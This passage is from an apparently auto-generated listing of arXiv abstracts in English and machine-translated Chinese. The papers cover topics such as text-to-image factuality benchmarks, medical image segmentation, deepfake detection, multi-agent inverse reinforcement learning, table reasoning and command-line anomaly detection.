摘要: 评估合成图像的质量仍然是文本到图像(T2I)生成领域中的一个重要挑战。目前大部分研究主要集中在评估文本-图像对齐、图像质量和物体组合能力,相比之下,更少的研究涉及T2I模型的事实性评估,特别是涉及知识密集型概念时。为了填补这一空白,我们在这项工作中提出了T2I-FactualBench——迄今为止概念数量和提示数量最多的基准测试,专门设计用于评估知识密集型概念生成的事实性。T2I-FactualBench包括一个三层知识密集型文本到图像生成框架,从单个知识概念的基本记忆到多个知识概念的复杂组合。我们进一步介绍了一个基于多轮视觉问答(VQA)的评估框架,用于评估三层知识密集型文本到图像生成任务的事实性。对T2I-FactualBench的实验表明,当前的最新技术(SOTA)T2I模型仍然有很大的改进空间。
更新时间: 2024-12-05 16:21:01
领域: cs.CV,cs.AI
Structure-Aware Stylized Image Synthesis for Robust Medical Image Segmentation
Accurate medical image segmentation is essential for effective diagnosis and treatment planning but is often challenged by domain shifts caused by variations in imaging devices, acquisition conditions, and patient-specific attributes. Traditional domain generalization methods typically require inclusion of parts of the test domain within the training set, which is not always feasible in clinical settings with limited diverse data. Additionally, although diffusion models have demonstrated strong capabilities in image generation and style transfer, they often fail to preserve the critical structural information necessary for precise medical analysis. To address these issues, we propose a novel medical image segmentation method that combines diffusion models and Structure-Preserving Network for structure-aware one-shot image stylization. Our approach effectively mitigates domain shifts by transforming images from various sources into a consistent style while maintaining the location, size, and shape of lesions. This ensures robust and accurate segmentation even when the target domain is absent from the training data. Experimental evaluations on colonoscopy polyp segmentation and skin lesion segmentation datasets show that our method enhances the robustness and accuracy of segmentation models, achieving superior performance metrics compared to baseline models without style transfer. This structure-aware stylization framework offers a practical solution for improving medical image segmentation across diverse domains, facilitating more reliable clinical diagnoses.
Updated: 2024-12-05 16:15:32
标题: 结构感知风格化图像合成用于鲁棒的医学图像分割
摘要: 精确的医学图像分割对于有效的诊断和治疗规划至关重要,但通常受到由成像设备、采集条件和患者特定属性变化引起的领域转移挑战。传统的领域泛化方法通常需要在训练集中包含部分测试领域的数据,但在具有有限多样化数据的临床环境中并非总是可行。此外,虽然扩散模型在图像生成和风格转移方面表现出强大能力,但它们经常无法保留对于精确医学分析必要的关键结构信息。为了解决这些问题,我们提出了一种结合扩散模型和保持结构网络的新型医学图像分割方法,用于结构感知的一次性图像风格化。我们的方法通过将来自各种来源的图像转换为一致的风格,同时保持病变的位置、大小和形状,有效缓解了领域转移。这确保了即使目标领域不在训练数据中,也能实现强大且准确的分割。在结肠镜息肉分割和皮肤病变分割数据集上的实验评估表明,我们的方法增强了分割模型的鲁棒性和准确性,相较于没有风格转移的基线模型,达到了更优越的性能指标。这种结构感知的风格化框架为改善跨不同领域的医学图像分割提供了实际解决方案,促进了更可靠的临床诊断。
更新时间: 2024-12-05 16:15:32
领域: eess.IV,cs.CV,cs.LG
SIDA: Social Media Image Deepfake Detection, Localization and Explanation with Large Multimodal Model
The rapid advancement of generative models in creating highly realistic images poses substantial risks for misinformation dissemination. For instance, a synthetic image, when shared on social media, can mislead extensive audiences and erode trust in digital content, resulting in severe repercussions. Despite some progress, academia has not yet created a large and diversified deepfake detection dataset for social media, nor has it devised an effective solution to address this issue. In this paper, we introduce the Social media Image Detection dataSet (SID-Set), which offers three key advantages: (1) extensive volume, featuring 300K AI-generated/tampered and authentic images with comprehensive annotations, (2) broad diversity, encompassing fully synthetic and tampered images across various classes, and (3) elevated realism, with images that are predominantly indistinguishable from genuine ones through mere visual inspection. Furthermore, leveraging the exceptional capabilities of large multimodal models, we propose a new image deepfake detection, localization, and explanation framework, named SIDA (Social media Image Detection, localization, and explanation Assistant). SIDA not only discerns the authenticity of images, but also delineates tampered regions through mask prediction and provides textual explanations of the model's judgment criteria. Compared with state-of-the-art deepfake detection models on SID-Set and other benchmarks, extensive experiments demonstrate that SIDA achieves superior performance among diversified settings. The code, model, and dataset will be released.
Updated: 2024-12-05 16:12:25
标题: 艾滋病:利用大型多模型模型进行社交媒体图像深度伪造检测、定位和解释
摘要: 生成模型在创建高度逼真图像方面的快速进展给误传播造成了重大风险。例如,当合成图像在社交媒体上分享时,可能会误导广大受众,破坏对数字内容的信任,造成严重后果。尽管取得了一些进展,学术界尚未为社交媒体创建一个大规模且多样化的深度伪造检测数据集,也未设计出有效的解决方案来解决这一问题。在本文中,我们介绍了社交媒体图像检测数据集(SID-Set),具有三个关键优势:(1)大量数据,包括30万个具有全面注释的AI生成/篡改和真实图像,(2)广泛多样性,涵盖各种类别的完全合成和篡改图像,以及(3)提高逼真度,图像主要通过纯视觉检查难以与真实图像区分开来。此外,利用大型多模型的卓越能力,我们提出了一种新的图像深度伪造检测、定位和解释框架,名为SIDA(社交媒体图像检测、定位和解释助手)。SIDA不仅可以识别图像的真实性,还可以通过掩模预测描绘篡改区域,并提供模型判断标准的文本解释。与SID-Set和其他基准上最先进的深度伪造检测模型相比,广泛的实验表明,SIDA在多样化设置中实现了卓越的性能。代码、模型和数据集将会发布。
更新时间: 2024-12-05 16:12:25
领域: cs.CV,cs.AI
Deep Causal Inference for Point-referenced Spatial Data with Continuous Treatments
Causal reasoning is often challenging with spatial data, particularly when handling high-dimensional inputs. To address this, we propose a neural network (NN) based framework integrated with an approximate Gaussian process to manage spatial interference and unobserved confounding. Additionally, we adopt a generalized propensity-score-based approach to address partially observed outcomes when estimating causal effects with continuous treatments. We evaluate our framework using synthetic, semi-synthetic, and real-world data inferred from satellite imagery. Our results demonstrate that NN-based models significantly outperform linear spatial regression models in estimating causal effects. Furthermore, in real-world case studies, NN-based models offer more reasonable predictions of causal effects, facilitating decision-making in relevant applications.
Updated: 2024-12-05 16:06:23
标题: 基于连续处理的点参考空间数据的深度因果推断
摘要: 因果推理通常在处理空间数据时具有挑战性,特别是在处理高维输入时。为了解决这个问题,我们提出了一个基于神经网络(NN)的框架,结合近似高斯过程来管理空间干扰和未观察到的混淆因素。此外,我们采用了基于广义倾向得分的方法来处理部分观察到的结果,以估算连续处理的因果效应。我们使用合成、半合成和从卫星影像推断出的真实数据来评估我们的框架。我们的结果表明,基于NN的模型在估算因果效应方面显著优于线性空间回归模型。此外,在真实案例研究中,基于NN的模型提供了更合理的因果效应预测,有助于相关应用中的决策制定。
更新时间: 2024-12-05 16:06:23
领域: cs.LG,J.2
Facility Location Games with Scaling Effects
We take the classic facility location problem and consider a variation, in which each agent's individual cost function is equal to their distance from the facility multiplied by a scaling factor which is determined by the facility placement. In addition to the general class of continuous scaling functions, we also provide results for piecewise linear scaling functions which can effectively approximate or model the scaling of many real world scenarios. We focus on the objectives of total and maximum cost, describing the computation of the optimal solution. We then move to the approximate mechanism design setting, observing that the agents' preferences may no longer be single-peaked. Consequently, we characterize the conditions on scaling functions which ensure that agents have single-peaked preferences. Under these conditions, we find a characterization of continuous, strategyproof, and anonymous mechanisms, and compute the total and maximum cost approximation ratios achievable by these mechanisms.
Updated: 2024-12-05 16:05:48
标题: 具有规模效应的设施选址博弈
摘要: 我们考虑了经典设施选址问题的一个变种,其中每个代理的个体成本函数等于他们距离设施的距离乘以一个由设施放置确定的缩放因子。除了连续缩放函数的一般类别外,我们还提供了分段线性缩放函数的结果,可以有效地近似或模拟许多现实场景的缩放。我们关注总成本和最大成本的目标,描述了最优解的计算。然后我们转向近似机制设计的设置,观察到代理的偏好可能不再是单峰的。因此,我们表征了确保代理有单峰偏好的缩放函数条件。在这些条件下,我们找到了连续、策略证明和匿名机制的表征,并计算了这些机制可以实现的总成本和最大成本近似比率。
更新时间: 2024-12-05 16:05:48
领域: cs.GT,cs.AI,cs.MA,econ.TH
On Multi-Agent Inverse Reinforcement Learning
In multi-agent systems, the agent behavior is highly influenced by its utility function, as these utilities shape both individual goals as well as interactions with the other agents. Inverse Reinforcement Learning (IRL) is a well-established approach to inferring the utility function by observing an expert behavior within a given environment. In this paper, we extend the IRL framework to the multi-agent setting, assuming to observe agents who are following Nash Equilibrium (NE) policies. We theoretically investigate the set of utilities that explain the behavior of NE experts. Specifically, we provide an explicit characterization of the feasible reward set and analyze how errors in estimating the transition dynamics and expert behavior impact the recovered rewards. Building on these findings, we provide the first sample complexity analysis for the multi-agent IRL problem. Finally, we provide a numerical evaluation of our theoretical results.
Updated: 2024-12-05 16:04:02
标题: 关于多智能体逆强化学习的研究
摘要: 在多智能体系统中,智能体的行为受其效用函数的高度影响,因为这些效用函数塑造了个体目标以及与其他智能体的互动。逆强化学习(IRL)是一种已经建立的方法,通过观察给定环境中的专家行为来推断效用函数。在本文中,我们将IRL框架扩展到多智能体设置中,假设观察到的智能体遵循纳什均衡(NE)策略。我们在理论上研究了解释NE专家行为的效用集合。具体而言,我们提供了可行奖励集合的明确特征化,并分析了在估计转移动力学和专家行为时出现的误差对恢复奖励的影响。基于这些发现,我们提供了多智能体IRL问题的首个样本复杂性分析。最后,我们对我们的理论结果进行了数值评估。
更新时间: 2024-12-05 16:04:02
领域: cs.LG
Complexity of Vector-valued Prediction: From Linear Models to Stochastic Convex Optimization
We study the problem of learning vector-valued linear predictors: these are prediction rules parameterized by a matrix that maps an $m$-dimensional feature vector to a $k$-dimensional target. We focus on the fundamental case with a convex and Lipschitz loss function, and show several new theoretical results that shed light on the complexity of this problem and its connection to related learning models. First, we give a tight characterization of the sample complexity of Empirical Risk Minimization (ERM) in this setting, establishing that $\smash{\widetilde{\Omega}}(k/\epsilon^2)$ examples are necessary for ERM to reach $\epsilon$ excess (population) risk; this provides for an exponential improvement over recent results by Magen and Shamir (2023) in terms of the dependence on the target dimension $k$, and matches a classical upper bound due to Maurer (2016). Second, we present a black-box conversion from general $d$-dimensional Stochastic Convex Optimization (SCO) to vector-valued linear prediction, showing that any SCO problem can be embedded as a prediction problem with $k=\Theta(d)$ outputs. These results portray the setting of vector-valued linear prediction as bridging between two extensively studied yet disparate learning models: linear models (corresponds to $k=1$) and general $d$-dimensional SCO (with $k=\Theta(d)$).
Updated: 2024-12-05 15:56:54
标题: 向量值预测的复杂性:从线性模型到随机凸优化
摘要: 我们研究学习向量值线性预测器的问题:这些是由一个映射$m$维特征向量到$k$维目标的矩阵参数化的预测规则。我们专注于基本情况,即具有凸和Lipschitz损失函数的情况,并展示了几个新的理论结果,揭示了这个问题的复杂性以及与相关学习模型的联系。首先,我们对这种情况下经验风险最小化(ERM)的样本复杂度进行了严格的刻画,建立了ERM需要$\smash{\widetilde{\Omega}}(k/\epsilon^2)$个样本才能达到$\epsilon$的多余(总体)风险;这在与目标维度$k$的依赖性方面相较于Magen和Shamir (2023)最近的结果实现了指数级的改进,并与Maurer (2016)的经典上界相匹配。其次,我们提出了一个从一般$d$维随机凸优化(SCO)到向量值线性预测的黑盒转换,表明任何SCO问题都可以嵌入为具有$k=\Theta(d)$个输出的预测问题。这些结果描述了向量值线性预测的设置,作为连接两个广泛研究但不同的学习模型之间的桥梁:线性模型(对应于$k=1$)和一般$d$维SCO(其中$k=\Theta(d)$)。
更新时间: 2024-12-05 15:56:54
领域: cs.LG
Reinforcement Learning from Wild Animal Videos
We propose to learn legged robot locomotion skills by watching thousands of wild animal videos from the internet, such as those featured in nature documentaries. Indeed, such videos offer a rich and diverse collection of plausible motion examples, which could inform how robots should move. To achieve this, we introduce Reinforcement Learning from Wild Animal Videos (RLWAV), a method to ground these motions into physical robots. We first train a video classifier on a large-scale animal video dataset to recognize actions from RGB clips of animals in their natural habitats. We then train a multi-skill policy to control a robot in a physics simulator, using the classification score of a third-person camera capturing videos of the robot's movements as a reward for reinforcement learning. Finally, we directly transfer the learned policy to a real quadruped Solo. Remarkably, despite the extreme gap in both domain and embodiment between animals in the wild and robots, our approach enables the policy to learn diverse skills such as walking, jumping, and keeping still, without relying on reference trajectories nor skill-specific rewards.
Updated: 2024-12-05 15:55:23
标题: 从野生动物视频学习的强化学习
摘要: 我们提议通过观看来自互联网上成千上万的野生动物视频,如自然纪录片中展示的视频,来学习四足机器人的运动技能。实际上,这些视频提供了一个丰富多样的合理运动示例集合,可以指导机器人应该如何移动。为了实现这一目标,我们引入了来自野生动物视频的强化学习(RLWAV)方法,将这些动作应用到实际机器人中。我们首先在一个大规模的动物视频数据集上训练一个视频分类器,以识别自然栖息地中动物的RGB视频片段中的动作。然后我们训练一个多技能策略,在物理模拟器中控制一个机器人,使用第三人称摄像头捕捉机器人运动视频的分类得分作为强化学习的奖励。最后,我们直接将学到的策略传输到一个真实的四足机器人Solo。值得注意的是,尽管野外动物和机器人之间的领域和实体之间存在极端差距,我们的方法使策略能够学习多样的技能,如行走、跳跃和保持静止,而不依赖于参考轨迹或技能特定的奖励。
更新时间: 2024-12-05 15:55:23
领域: cs.RO,cs.CV,cs.LG
PoTable: Programming Standardly on Table-based Reasoning Like a Human Analyst
Table-based reasoning has garnered substantial research interest, particularly in its integration with Large Language Model (LLM) which has revolutionized the general reasoning paradigm. Numerous LLM-based studies introduce symbolic tools (e.g., databases, Python) as assistants to extend human-like abilities in structured table understanding and complex arithmetic computations. However, these studies can be improved better in simulating human cognitive behavior when using symbolic tools, as they still suffer from limitations of non-standard logical splits and constrained operation pools. In this study, we propose PoTable as a novel table-based reasoning method that simulates a human tabular analyst, which integrates a Python interpreter as the real-time executor accompanied by an LLM-based operation planner and code generator. Specifically, PoTable follows a human-like logical stage split and extends the operation pool into an open-world space without any constraints. Through planning and executing in each distinct stage, PoTable standardly completes the entire reasoning process and produces superior reasoning results along with highly accurate, steply commented and completely executable programs. Accordingly, the effectiveness and explainability of PoTable are fully demonstrated. Extensive experiments over three evaluation datasets from two public benchmarks on two backbones show the outstanding performance of our approach. In particular, GPT-based PoTable achieves over 4% higher absolute accuracy than runner-ups on all evaluation datasets.
Updated: 2024-12-05 15:54:16
标题: PoTable:像人类分析师一样标准地在基于表格推理上编程
摘要: 基于表格的推理引起了相当大的研究兴趣,特别是与大型语言模型(LLM)的整合,这种整合已经彻底改变了一般推理范式。许多基于LLM的研究引入了符号工具(例如数据库、Python)作为助手,以扩展人类在结构化表格理解和复杂算术计算方面的能力。然而,这些研究在使用符号工具时仍然存在模拟人类认知行为的局限性,因为它们仍然受到非标准逻辑拆分和受限操作池的限制。在本研究中,我们提出了PoTable作为一种新颖的基于表格的推理方法,模拟了人类的表格分析员,该方法集成了一个Python解释器作为实时执行器,同时伴随着一个基于LLM的操作规划器和代码生成器。具体而言,PoTable遵循人类般的逻辑阶段拆分,并将操作池扩展到一个没有任何约束的开放世界空间。通过在每个不同阶段进行规划和执行,PoTable标准地完成整个推理过程,并产生优越的推理结果,以及高度准确、逐步注释和完全可执行的程序。因此,PoTable的有效性和可解释性得到了充分展示。对来自两个公共基准测试的三个评估数据集进行的广泛实验显示了我们方法的出色性能。特别是,基于GPT的PoTable在所有评估数据集上的绝对准确率比其他参赛者高出4%以上。
更新时间: 2024-12-05 15:54:16
领域: cs.IR,cs.AI
CoSy: Evaluating Textual Explanations of Neurons
A crucial aspect of understanding the complex nature of Deep Neural Networks (DNNs) is the ability to explain learned concepts within their latent representations. While methods exist to connect neurons to human-understandable textual descriptions, evaluating the quality of these explanations is challenging due to the lack of a unified quantitative approach. We introduce CoSy (Concept Synthesis), a novel, architecture-agnostic framework for evaluating textual explanations of latent neurons. Given textual explanations, our proposed framework uses a generative model conditioned on textual input to create data points representing the explanations. By comparing the neuron's response to these generated data points and control data points, we can estimate the quality of the explanation. We validate our framework through sanity checks and benchmark various neuron description methods for Computer Vision tasks, revealing significant differences in quality.
Updated: 2024-12-05 15:48:24
标题: CoSy: 评估神经元的文本解释
摘要: 理解深度神经网络(DNNs)复杂性的一个关键方面是能够解释它们潜在表示中学习到的概念。虽然存在将神经元与人类可理解的文本描述联系起来的方法,但由于缺乏统一的定量方法,评估这些解释的质量是具有挑战性的。我们引入了CoSy(Concept Synthesis),这是一个新颖的、与架构无关的框架,用于评估潜在神经元的文本解释。在给定文本解释的情况下,我们提出的框架使用一个基于文本输入的生成模型来创建代表这些解释的数据点。通过比较神经元对这些生成的数据点和控制数据点的响应,我们可以估计解释的质量。我们通过理智性检查验证了我们的框架,并针对计算机视觉任务基准测试了各种神经元描述方法,揭示了质量上的显著差异。
更新时间: 2024-12-05 15:48:24
领域: cs.LG,cs.AI,cs.CL
Finite-sample performance of the maximum likelihood estimator in logistic regression
Logistic regression is a classical model for describing the probabilistic dependence of binary responses to multivariate covariates. We consider the predictive performance of the maximum likelihood estimator (MLE) for logistic regression, assessed in terms of logistic risk. We consider two questions: first, that of the existence of the MLE (which occurs when the dataset is not linearly separated), and second that of its accuracy when it exists. These properties depend on both the dimension of covariates and on the signal strength. In the case of Gaussian covariates and a well-specified logistic model, we obtain sharp non-asymptotic guarantees for the existence and excess logistic risk of the MLE. We then generalize these results in two ways: first, to non-Gaussian covariates satisfying a certain two-dimensional margin condition, and second to the general case of statistical learning with a possibly misspecified logistic model. Finally, we consider the case of a Bernoulli design, where the behavior of the MLE is highly sensitive to the parameter direction.
Updated: 2024-12-05 15:46:44
标题: 逻辑回归中最大似然估计器的有限样本性能
摘要: 逻辑回归是描述二元响应与多元协变量之间概率依赖关系的经典模型。我们考虑逻辑回归的最大似然估计(MLE)的预测性能,以逻辑风险作为评估标准。我们考虑两个问题:首先是MLE的存在性(当数据集没有线性分离时会发生),其次是在存在时的准确性。这些属性取决于协变量的维度和信号强度。在高斯协变量和逻辑模型明确定义的情况下,我们得到MLE存在性和超额逻辑风险的锐利非渐近保证。然后我们以两种方式推广这些结果:首先是对满足特定二维边缘条件的非高斯协变量,其次是对可能错误指定逻辑模型的统计学习的一般情况。最后,我们考虑伯努利设计的情况,其中MLE的行为对参数方向非常敏感。
更新时间: 2024-12-05 15:46:44
领域: math.ST,cs.LG,stat.ML,stat.TH
SynFinTabs: A Dataset of Synthetic Financial Tables for Information and Table Extraction
Table extraction from document images is a challenging AI problem, and labelled data for many content domains is difficult to come by. Existing table extraction datasets often focus on scientific tables due to the vast amount of academic articles that are readily available, along with their source code. However, there are significant layout and typographical differences between tables found across scientific, financial, and other domains. Current datasets often lack the words, and their positions, contained within the tables, instead relying on unreliable OCR to extract these features for training modern machine learning models on natural language processing tasks. Therefore, there is a need for a more general method of obtaining labelled data. We present SynFinTabs, a large-scale, labelled dataset of synthetic financial tables. Our hope is that our method of generating these synthetic tables is transferable to other domains. To demonstrate the effectiveness of our dataset in training models to extract information from table images, we create FinTabQA, a layout large language model trained on an extractive question-answering task. We test our model using real-world financial tables and compare it to a state-of-the-art generative model and discuss the results. We make the dataset, model, and dataset generation code publicly available.
Updated: 2024-12-05 15:42:59
标题: SynFinTabs:用于信息和表格提取的合成财务表数据集
摘要: 来自文档图像的表格提取是一个具有挑战性的人工智能问题,许多内容领域的标记数据很难获取。现有的表格提取数据集通常侧重于科学表格,因为大量的学术文章及其源代码是readily可用的。然而,科学、金融和其他领域的表格之间存在显著的布局和排版差异。当前数据集通常缺乏表格中包含的单词及其位置,而是依赖于不可靠的OCR来提取这些特征,用于训练现代机器学习模型进行自然语言处理任务。因此,有必要找到一种更通用的获取标记数据的方法。我们提出了SynFinTabs,一个大规模的合成金融表格标记数据集。我们希望我们生成这些合成表格的方法可以应用到其他领域。为了展示我们的数据集在训练模型从表格图像中提取信息方面的有效性,我们创建了FinTabQA,一个在提取式问答任务上训练的大型语言模型。我们使用真实的金融表格测试我们的模型,并将其与最先进的生成模型进行比较,并讨论结果。我们公开提供数据集、模型和数据集生成代码。
更新时间: 2024-12-05 15:42:59
领域: cs.LG
Enhancing Whole Slide Image Classification through Supervised Contrastive Domain Adaptation
Domain shift in the field of histopathological imaging is a common phenomenon due to the intra- and inter-hospital variability of staining and digitization protocols. The implementation of robust models, capable of creating generalized domains, represents a need to be solved. In this work, a new domain adaptation method to deal with the variability between histopathological images from multiple centers is presented. In particular, our method adds a training constraint to the supervised contrastive learning approach to achieve domain adaptation and improve inter-class separability. Experiments performed on domain adaptation and classification of whole-slide images of six skin cancer subtypes from two centers demonstrate the method's usefulness. The results reflect superior performance compared to not using domain adaptation after feature extraction or staining normalization.
Updated: 2024-12-05 15:39:54
标题: 通过监督对比域自适应提升全切片图像分类
摘要: 组织病理学成像领域中的域转移是由于染色和数字化协议的医院内和医院间变异性而普遍存在的现象。 实现能够创建广义域的强大模型代表需要解决的问题。 本文提出了一种新的域自适应方法,用于处理来自多个中心的组织病理学图像之间的变异性。 具体而言,我们的方法向监督对比学习方法添加了一个训练约束,以实现域适应并改善类间可分性。 对来自两个中心的六种皮肤癌亚型的全切片图像进行的域适应和分类实验表明了该方法的实用性。 结果表明,在特征提取或染色归一化后不使用域适应的情况下,该方法表现出优越的性能。
更新时间: 2024-12-05 15:39:54
领域: cs.CV,cs.AI
SCADE: Scalable Command-line Anomaly Detection Engine
As command-line interfaces remain an integral part of high-computation environments, the risk of exploitation through stealthy, complex command-line abuse continues to grow. Conventional security solutions often struggle with these command-line-based anomalies due to their context-specific nature and lack of labeled data, especially in detecting rare, malicious patterns amidst legitimate, high-volume activity. This gap has left organizations vulnerable to sophisticated threats like Living-off-the-Land (LOL) attacks, where standard detection tools frequently miss or misclassify anomalous command-line behavior. We introduce Scalable Command-Line Anomaly Detection Engine (SCADE), who addresses these challenges by introducing a dual-layered detection framework that combines a global statistical analysis with local context-specific anomaly detection, innovatively using a novel ensemble of statistical models such as BM25 and Log Entropy, adapted for command-line data. The framework also features a dynamic thresholding mechanism for adaptive anomaly detection, ensuring high precision and recall even in environments with extremely high Signal-to-Noise Ratios (SNRs). Initial experimental results demonstrate the effectiveness of the framework, achieving above 98% SNR in identifying unusual command-line behavior while minimizing false positives. In this paper, we present SCADE's core architecture, including its metadata-enriched approach to anomaly detection and the design choices behind its scalability for enterprise-level deployment. We argue that SCADE represents a significant advancement in command-line anomaly detection, offering a robust, adaptive framework for security analysts and researchers seeking to enhance detection accuracy in high-computation environments.
Updated: 2024-12-05 15:39:13
标题: SCADE:可扩展的命令行异常检测引擎
摘要: 随着命令行界面仍然是高计算环境的一个重要部分,通过隐秘、复杂的命令行滥用进行利用的风险不断增加。传统的安全解决方案通常难以处理这些基于命令行的异常,因为它们具有特定上下文的特性并且缺乏标记数据,尤其是在检测合法高容量活动中罕见的恶意模式时。这种差距使组织容易受到像"Living-off-the-Land"(LOL)攻击这样的复杂威胁的影响,在这种攻击中,标准检测工具经常会错过或错误分类异常的命令行行为。我们引入了可扩展的命令行异常检测引擎(SCADE),通过引入一个结合全局统计分析和局部特定上下文异常检测的双层检测框架,创新地使用了一种新颖的统计模型集合,如BM25和Log Entropy,针对命令行数据进行了调整,来解决这些挑战。该框架还具有一种动态阈值机制,用于自适应异常检测,确保在具有极高信噪比(SNR)的环境中也能获得高精度和召回率。初步实验结果表明,该框架的有效性,能够在识别异常命令行行为时实现超过98%的SNR,同时最小化误报。在本文中,我们介绍了SCADE的核心架构,包括其对元数据的丰富化方法以及其针对企业级部署可扩展性的设计选择。我们认为,SCADE代表了命令行异常检测的重大进步,为寻求提高在高计算环境中检测准确性的安全分析师和研究人员提供了一个强大、自适应的框架。
更新时间: 2024-12-05 15:39:13
领域: cs.CR,cs.LG
Transient Multi-Agent Path Finding for Lifelong Navigation in Dense Environments
Multi-Agent Path Finding (MAPF) deals with finding conflict-free paths for a set of agents from an initial configuration to a given target configuration. The Lifelong MAPF (LMAPF) problem is a well-studied online version of MAPF in which an agent receives a new target when it reaches its current target. The common approach for solving LMAPF is to treat it as a sequence of MAPF problems, periodically replanning from the agents' current configurations to their current targets. A significant drawback in this approach is that in MAPF the agents must reach a configuration in which all agents are at their targets simultaneously, which is needlessly restrictive for LMAPF. Techniques have been proposed to indirectly mitigate this drawback. We describe cases where these mitigation techniques fail. As an alternative, we propose to solve LMAPF problems by solving a sequence of modified MAPF problems, in which the objective is for each agent to eventually visit its target, but not necessarily for all agents to do so simultaneously. We refer to this MAPF variant as Transient MAPF (TMAPF) and propose several algorithms for solving it based on existing MAPF algorithms. A limited experimental evaluation identifies some cases where using a TMAPF algorithm instead of a MAPF algorithm with an LMAPF framework can improve the system throughput significantly.
Updated: 2024-12-05 15:37:29
标题: 暂时性多智能体路径规划:在密集环境中进行终生导航
摘要: 多智能体路径规划(MAPF)涉及为一组智能体从初始配置到给定目标配置找到无冲突的路径。终身MAPF(LMAPF)问题是MAPF的一个经过深入研究的在线版本,在该版本中,当智能体到达当前目标时会接收一个新的目标。解决LMAPF的常见方法是将其视为一系列MAPF问题,周期性地重新规划从智能体的当前配置到其当前目标。这种方法的一个重要缺点是,在MAPF中,智能体必须达到一个配置,其中所有智能体同时到达其目标,这对LMAPF来说是不必要地限制性的。已经提出了一些技术来间接缓解这个缺点。我们描述了这些缓解技术失败的情况。作为一种替代方案,我们建议通过解决一系列修改后的MAPF问题来解决LMAPF问题,其中目标是让每个智能体最终访问其目标,但不一定要求所有智能体同时这样做。我们将这种MAPF变体称为瞬态MAPF(TMAPF),并提出了基于现有MAPF算法的几种解决方案。有限的实验评估确定了一些情况,即在LMAPF框架中使用TMAPF算法而不是MAPF算法可以显著提高系统吞吐量。
更新时间: 2024-12-05 15:37:29
领域: cs.MA,cs.AI,cs.RO
CLINICSUM: Utilizing Language Models for Generating Clinical Summaries from Patient-Doctor Conversations
This paper presents ClinicSum, a novel framework designed to automatically generate clinical summaries from patient-doctor conversations. It utilizes a two-module architecture: a retrieval-based filtering module that extracts Subjective, Objective, Assessment, and Plan (SOAP) information from conversation transcripts, and an inference module powered by fine-tuned Pre-trained Language Models (PLMs), which leverage the extracted SOAP data to generate abstracted clinical summaries. To fine-tune the PLM, we created a training dataset of consisting 1,473 conversations-summaries pair by consolidating two publicly available datasets, FigShare and MTS-Dialog, with ground truth summaries validated by Subject Matter Experts (SMEs). ClinicSum's effectiveness is evaluated through both automatic metrics (e.g., ROUGE, BERTScore) and expert human assessments. Results show that ClinicSum outperforms state-of-the-art PLMs, demonstrating superior precision, recall, and F-1 scores in automatic evaluations and receiving high preference from SMEs in human assessment, making it a robust solution for automated clinical summarization.
Updated: 2024-12-05 15:34:02
标题: 临床总结:利用语言模型从患者-医生对话生成临床总结
摘要: 这篇论文介绍了ClinicSum,一个新颖的框架,旨在自动从患者和医生的对话中生成临床摘要。它利用了一个两模块架构:一个基于检索的过滤模块,从对话转录中提取主观、客观、评估和计划(SOAP)信息,以及一个由经过微调的预训练语言模型(PLMs)驱动的推理模块,利用提取的SOAP数据生成摘要的临床摘要。为了微调PLM,我们创建了一个由1,473个对话-摘要对组成的训练数据集,通过整合两个公开可用的数据集FigShare和MTS-Dialog,并由主题专家(SMEs)验证了真实摘要。通过自动度量指标(如ROUGE、BERTScore)和专家人工评估对ClinicSum的有效性进行评估。结果显示ClinicSum在自动评估中优于最先进的PLMs,在精度、召回率和F-1分数方面表现出色,并且在人工评估中受到SMEs的高度偏好,使其成为自动临床摘要的强大解决方案。
更新时间: 2024-12-05 15:34:02
领域: cs.CL,cs.AI
Calib3D: Calibrating Model Preferences for Reliable 3D Scene Understanding
Safety-critical 3D scene understanding tasks necessitate not only accurate but also confident predictions from 3D perception models. This study introduces Calib3D, a pioneering effort to benchmark and scrutinize the reliability of 3D scene understanding models from an uncertainty estimation viewpoint. We comprehensively evaluate 28 state-of-the-art models across 10 diverse 3D datasets, uncovering insightful phenomena that cope with both the aleatoric and epistemic uncertainties in 3D scene understanding. We discover that despite achieving impressive levels of accuracy, existing models frequently fail to provide reliable uncertainty estimates -- a pitfall that critically undermines their applicability in safety-sensitive contexts. Through extensive analysis of key factors such as network capacity, LiDAR representations, rasterization resolutions, and 3D data augmentation techniques, we correlate these aspects directly with the model calibration efficacy. Furthermore, we introduce DeptS, a novel depth-aware scaling approach aimed at enhancing 3D model calibration. Extensive experiments across a wide range of configurations validate the superiority of our method. We hope this work could serve as a cornerstone for fostering reliable 3D scene understanding. Code and benchmark toolkit are publicly available.
Updated: 2024-12-05 15:33:29
标题: Calib3D:校准模型偏好以实现可靠的3D场景理解
摘要: 安全关键的三维场景理解任务不仅需要来自三维感知模型的准确预测,还需要自信的预测。本研究介绍了Calib3D,这是一项开拓性的工作,旨在从不确定性估计的角度对三维场景理解模型的可靠性进行基准测试和审查。我们全面评估了28种领先的模型在10个不同的三维数据集上的表现,揭示了解决三维场景理解中的随机和认知不确定性的有见地现象。我们发现,尽管现有模型实现了令人印象深刻的准确性水平,但它们经常未能提供可靠的不确定性估计 -- 这是一个严重损害它们在安全敏感环境中适用性的陷阱。通过对网络容量、LiDAR表示、光栅化分辨率和三维数据增强技术等关键因素的广泛分析,我们直接将这些方面与模型校准效果进行了关联。此外,我们引入了DeptS,一种旨在增强三维模型校准的新型深度感知缩放方法。在广泛的配置下进行的实验验证了我们方法的优越性。我们希望这项工作可以成为培育可靠的三维场景理解的基石。代码和基准工具包均已公开。
更新时间: 2024-12-05 15:33:29
领域: cs.CV,cs.LG,cs.RO
Bayesian evidence estimation from posterior samples with normalizing flows
We propose a novel method ($floZ$), based on normalizing flows, to estimate the Bayesian evidence (and its numerical uncertainty) from a pre-existing set of samples drawn from the unnormalized posterior distribution. We validate it on distributions whose evidence is known analytically, up to 15 parameter space dimensions, and compare with two state-of-the-art techniques for estimating the evidence: nested sampling (which computes the evidence as its main target) and a $k$-nearest-neighbors technique that produces evidence estimates from posterior samples. Provided representative samples from the target posterior are available, our method is more robust to posterior distributions with sharp features, especially in higher dimensions. For a simple multivariate Gaussian, we demonstrate its accuracy for up to 200 dimensions with $10^5$ posterior samples. $floZ$ has wide applicability, e.g., to estimate evidence from variational inference, Markov Chain Monte Carlo samples, or any other method that delivers samples and their likelihood from the unnormalized posterior density. As a physical application, we use $floZ$ to compute the Bayes factor for the presence of the first overtone in the ringdown signal of the gravitational wave data of GW150914, finding good agreement with nested sampling.
Updated: 2024-12-05 15:27:14
标题: 用正规化流从后验样本中估计贝叶斯证据
